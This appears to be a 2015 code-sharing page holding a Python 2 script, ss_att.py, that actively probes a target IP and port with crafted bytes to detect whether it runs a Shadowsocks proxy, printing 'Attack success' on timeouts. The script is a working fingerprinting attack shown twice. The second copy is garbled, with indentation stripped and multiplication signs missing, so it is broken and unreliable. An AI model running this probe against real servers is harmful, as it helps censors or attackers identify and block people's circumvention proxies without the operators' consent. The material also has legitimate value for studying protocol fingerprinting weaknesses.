ohyeah521 · November 10, 2015 13:44
diff --git a/ss_att.py b/ss_att.py
 #!/usr/bin/env python
 #-*- coding: utf-8 -*-

 '''
 Copyleft (c) 2015 breakwa11
 https://github.com/breakwa11/shadowsocks-rss
 '''

 import logging
 import socket
 import time
 import traceback

 def test_single(iv_len, ip, port, addrtype, attack_data, timeout = 10):
 	addrs = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)
 	af, socktype, proto, canonname, sa = addrs[0]
 	s = socket.socket(af, socket.SOCK_STREAM)
 	s.connect((ip, port))
 	s.settimeout(timeout)
 	s.send("\x01"*iv_len + chr(addrtype) + attack_data)
 	ok = False
 	try:
 		ret = s.recv(1024)
 	except socket.timeout:
 		ok = True
 	except:
 		pass
 	if ok:
 		print("Attack success with %d" % addrtype)
 	else:
 		print("Attack failure with %d" % addrtype)
 	return ok

 def test_scan(iv_len, ip, port, attack_data, timeout = 10):
 	attack_ok_list = []
 	for i in xrange(256):
 		if i > 0 and i % 25 == 0:
 			print("%d%%" % (i / 25 * 10,))
 		addrs = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)
 		af, socktype, proto, canonname, sa = addrs[0]
 		s = socket.socket(af, socket.SOCK_STREAM)
 		s.connect((ip, port))
 		s.settimeout(timeout)
 		s.send("\x01"*iv_len + chr(i) + attack_data)
 		try:
 			ret = s.recv(1024)
 		except socket.timeout:
 			attack_ok_list.append(i)
 		except:
 			pass
 		if len(attack_ok_list) > 4:
 			break
 		#time.sleep(1)

 	if attack_ok_list:
 		if len(attack_ok_list) <= 2:
 			print("Attack success %s" % attack_ok_list)
 			return attack_ok_list
 		elif len(attack_ok_list) <= 4:
 			print("Need double check %s" % attack_ok_list)
 			return attack_ok_list
 		else:
 			print("Attack failure")
 	else:
 		print("Attack failure")

 def scan(iv_len, addr, port, scan_att_data = "\x03"*6, single_att_data = "\x24"*6): #len(att_data) == 6
 	attack_ok_list = test_scan(iv_len, addr, port, scan_att_data)
 	if attack_ok_list:
 		ok_count = 0
 		for addrtype in attack_ok_list:
 			if test_single(iv_len, addr, port, addrtype, "\x24"*6):
 				ok_count += 1
 		if ok_count in [1, 2]:
 			print("%s:%d is a Shadowsocks server" % (addr, port))
 		else:
 			print("%s:%d is an unknown server" % (addr, port))
 	else:
 		print("%s:%d is an unknown server" % (addr, port))

 if __name__ == '__main__':
 	'''
 	NOT 100% success, but most of
 	change att_data if nessesary
 	'''
 	#scan(16, "123.125.114.144", 80) # test baidu
 	#scan(16, "123.125.114.144", 443) # test baidu
 	scan(16, "192.168.0.100", 8898, "\x2a"*6, "\x05"*6) # test your target server
 	#scan( 8, "192.168.0.100", 8898, "\xf7"*6, "\x95"*6) # test your target server (chacha20/salsa20 encryptor)
	#!/usr/bin/env python
	#-- coding: utf-8 --

	'''
	Copyleft (c) 2015 breakwa11
	https://github.com/breakwa11/shadowsocks-rss
	'''

	import logging
	import socket
	import time
	import traceback

	def test_single(iv_len, ip, port, addrtype, attack_data, timeout = 10):
	addrs = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)
	af, socktype, proto, canonname, sa = addrs[0]
	s = socket.socket(af, socket.SOCK_STREAM)
	s.connect((ip, port))
	s.settimeout(timeout)
	s.send("\x01"*iv_len + chr(addrtype) + attack_data)
	ok = False
	try:
	ret = s.recv(1024)
	except socket.timeout:
	ok = True
	except:
	pass
	if ok:
	print("Attack success with %d" % addrtype)
	else:
	print("Attack failure with %d" % addrtype)
	return ok

	def test_scan(iv_len, ip, port, attack_data, timeout = 10):
	attack_ok_list = []
	for i in xrange(256):
	if i > 0 and i % 25 == 0:
	print("%d%%" % (i / 25 * 10,))
	addrs = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)
	af, socktype, proto, canonname, sa = addrs[0]
	s = socket.socket(af, socket.SOCK_STREAM)
	s.connect((ip, port))
	s.settimeout(timeout)
	s.send("\x01"*iv_len + chr(i) + attack_data)
	try:
	ret = s.recv(1024)
	except socket.timeout:
	attack_ok_list.append(i)
	except:
	pass
	if len(attack_ok_list) > 4:
	break
	#time.sleep(1)

	if attack_ok_list:
	if len(attack_ok_list) <= 2:
	print("Attack success %s" % attack_ok_list)
	return attack_ok_list
	elif len(attack_ok_list) <= 4:
	print("Need double check %s" % attack_ok_list)
	return attack_ok_list
	else:
	print("Attack failure")
	else:
	print("Attack failure")

	def scan(iv_len, addr, port, scan_att_data = "\x03"6, single_att_data = "\x24"6): #len(att_data) == 6
	attack_ok_list = test_scan(iv_len, addr, port, scan_att_data)
	if attack_ok_list:
	ok_count = 0
	for addrtype in attack_ok_list:
	if test_single(iv_len, addr, port, addrtype, "\x24"*6):
	ok_count += 1
	if ok_count in [1, 2]:
	print("%s:%d is a Shadowsocks server" % (addr, port))
	else:
	print("%s:%d is an unknown server" % (addr, port))
	else:
	print("%s:%d is an unknown server" % (addr, port))

	if __name__ == '__main__':
	'''
	NOT 100% success, but most of
	change att_data if nessesary
	'''
	#scan(16, "123.125.114.144", 80) # test baidu
	#scan(16, "123.125.114.144", 443) # test baidu
	scan(16, "192.168.0.100", 8898, "\x2a"6, "\x05"6) # test your target server
	#scan( 8, "192.168.0.100", 8898, "\xf7"6, "\x95"6) # test your target server (chacha20/salsa20 encryptor)
No results found